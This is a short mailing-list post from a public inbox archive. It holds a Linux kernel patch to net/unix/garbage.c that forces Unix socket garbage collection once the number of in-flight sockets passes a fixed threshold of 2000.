A patch was posted yesterday, and need some adjustements.


diff --git a/net/unix/garbage.c b/net/unix/garbage.c
index c8df6fd..40df93d 100644
--- a/net/unix/garbage.c
+++ b/net/unix/garbage.c
@@ -259,9 +259,16 @@ static void inc_inflight_move_tail(struct unix_sock *u)
 }
 
 static bool gc_in_progress = false;
+#define UNIX_INFLIGHT_TRIGGER_GC 2000
 
 void wait_for_unix_gc(void)
 {
+	/*
+	 * If number of inflight sockets is insane,
+	 * force a garbage collect right now.
+	 */
+	if (unix_tot_inflight > UNIX_INFLIGHT_TRIGGER_GC && !gc_in_progress)
+		unix_gc();
 	wait_event(unix_gc_wait, gc_in_progress == false);
 }
 

^ permalink raw reply related

page: next (older) | prev (newer) | latest
- recent:[subjects (threaded)|topics (new)|topics (active)]

This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox